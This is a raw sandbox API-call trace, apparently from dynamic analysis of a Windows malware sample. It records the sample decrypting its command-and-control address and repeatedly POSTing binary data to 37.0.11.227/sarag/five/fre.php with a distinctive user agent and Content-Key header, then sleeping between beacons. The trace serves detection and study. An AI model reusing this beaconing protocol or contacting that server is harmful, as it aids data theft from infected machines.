GetProcessHeap () returned 0x690000 [0227.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0227.881] GetProcessHeap () returned 0x690000 [0227.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0227.882] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0227.883] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0227.883] GetProcessHeap () returned 0x690000 [0227.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0227.883] GetProcessHeap () returned 0x690000 [0227.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0227.883] send (s=0x5bc, buf=0x6ad508*, len=242, flags=0) returned 242 [0227.884] send (s=0x5bc, buf=0x6aba40*, len=159, flags=0) returned 159 [0227.884] GetProcessHeap () returned 0x690000 [0227.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0227.884] recv (in: s=0x5bc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0227.978] GetProcessHeap () returned 0x690000 [0227.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0227.979] GetProcessHeap () returned 0x690000 [0227.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0227.982] GetProcessHeap () returned 0x690000 [0227.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0227.982] GetProcessHeap () returned 0x690000 [0227.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0227.983] closesocket (s=0x5bc) returned 0 [0227.983] GetProcessHeap () returned 0x690000 [0227.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0227.983] GetProcessHeap () returned 0x690000 [0227.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0227.984] GetProcessHeap () returned 0x690000 [0227.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0227.984] GetProcessHeap () returned 0x690000 [0227.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0227.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd5c) returned 0x5bc [0227.997] Sleep (dwMilliseconds=0xea60) [0227.998] GetProcessHeap () returned 0x690000 [0227.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0227.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0227.999] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.005] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.007] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0228.012] GetProcessHeap () returned 0x690000 [0228.012] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0228.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.013] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.015] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.016] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.016] GetProcessHeap () returned 0x690000 [0228.016] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0228.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.020] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0228.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.021] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.022] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0228.022] GetProcessHeap () returned 0x690000 [0228.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.023] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.024] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.025] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.025] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.025] GetProcessHeap () returned 0x690000 [0228.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0228.025] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.026] GetProcessHeap () returned 0x690000 [0228.026] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0228.026] GetProcessHeap () returned 0x690000 [0228.027] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0228.029] GetProcessHeap () returned 0x690000 [0228.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0228.029] GetProcessHeap () returned 0x690000 [0228.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0228.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.030] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0228.042] GetProcessHeap () returned 0x690000 [0228.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0228.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.043] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.043] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.044] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.044] GetProcessHeap () returned 0x690000 [0228.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0228.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.046] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0228.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.047] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.048] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0228.048] GetProcessHeap () returned 0x690000 [0228.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.048] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0228.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.049] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0228.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.050] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0228.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.051] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0228.051] GetProcessHeap () returned 0x690000 [0228.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0228.051] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0228.051] GetProcessHeap () returned 0x690000 [0228.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0228.051] socket (af=2, type=1, protocol=6) returned 0x5c0 [0228.051] connect (s=0x5c0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0228.079] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0228.079] GetProcessHeap () returned 0x690000 [0228.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0228.079] GetProcessHeap () returned 0x690000 [0228.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0228.079] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.080] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.080] GetProcessHeap () returned 0x690000 [0228.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0228.080] GetProcessHeap () returned 0x690000 [0228.081] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.081] GetProcessHeap () returned 0x690000 [0228.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0228.081] GetProcessHeap () returned 0x690000 [0228.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0228.082] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.085] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.085] GetProcessHeap () returned 0x690000 [0228.085] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0228.085] GetProcessHeap () returned 0x690000 [0228.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.085] send (s=0x5c0, buf=0x6ad508*, len=242, flags=0) returned 242 [0228.086] send (s=0x5c0, buf=0x6aba40*, len=159, flags=0) returned 159 [0228.086] GetProcessHeap () returned 0x690000 [0228.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0228.086] recv (in: s=0x5c0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0228.173] GetProcessHeap () returned 0x690000 [0228.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0228.174] GetProcessHeap () returned 0x690000 [0228.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0228.174] GetProcessHeap () returned 0x690000 [0228.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0228.175] GetProcessHeap () returned 0x690000 [0228.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0228.175] closesocket (s=0x5c0) returned 0 [0228.176] GetProcessHeap () returned 0x690000 [0228.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0228.176] GetProcessHeap () returned 0x690000 [0228.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0228.177] GetProcessHeap () returned 0x690000 [0228.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0228.177] GetProcessHeap () returned 0x690000 [0228.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0228.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc90) returned 0x5c0 [0228.179] Sleep (dwMilliseconds=0xea60) [0228.182] GetProcessHeap () returned 0x690000 [0228.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0228.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.184] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.194] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0228.206] GetProcessHeap () returned 0x690000 [0228.206] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0228.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.207] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.208] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.218] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.218] GetProcessHeap () returned 0x690000 [0228.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0228.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.219] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0228.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.220] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.221] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0228.221] GetProcessHeap () returned 0x690000 [0228.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.222] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.223] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.223] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.224] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.224] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.224] GetProcessHeap () returned 0x690000 [0228.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0228.226] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0228.226] GetProcessHeap () returned 0x690000 [0228.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0228.227] GetProcessHeap () returned 0x690000 [0228.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0228.227] GetProcessHeap () returned 0x690000 [0228.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0228.227] GetProcessHeap () returned 0x690000 [0228.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0228.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0228.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.233] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0228.254] GetProcessHeap () returned 0x690000 [0228.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0228.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.255] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0228.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.255] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0228.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.256] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.256] GetProcessHeap () returned 0x690000 [0228.257] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0228.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.258] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0228.258] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.258] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0228.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0228.259] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0228.259] GetProcessHeap () returned 0x690000 [0228.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0228.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.260] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0228.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.261] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0228.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.262] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0228.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0228.263] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0228.263] GetProcessHeap () returned 0x690000 [0228.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0228.263] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0228.263] GetProcessHeap () returned 0x690000 [0228.263] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4e0 [0228.263] socket (af=2, type=1, protocol=6) returned 0x5c4 [0228.264] connect (s=0x5c4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0228.288] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0228.288] GetProcessHeap () returned 0x690000 [0228.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0228.288] GetProcessHeap () returned 0x690000 [0228.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0228.289] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.293] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0228.293] GetProcessHeap () returned 0x690000 [0228.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0228.293] GetProcessHeap () returned 0x690000 [0228.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.294] GetProcessHeap () returned 0x690000 [0228.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0228.294] GetProcessHeap () returned 0x690000 [0228.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0228.295] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0228.296] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0228.296] GetProcessHeap () returned 0x690000 [0228.296] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0228.296] GetProcessHeap () returned 0x690000 [0228.297] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0228.297] send (s=0x5c4, buf=0x6ad508*, len=242, flags=0) returned 242 [0228.297] send (s=0x5c4, buf=0x6aba40*, len=159, flags=0) returned 159 [0228.297] GetProcessHeap () returned 0x690000 [0228.297] RtlAllocateHeap (HeapHandle=0x690000, 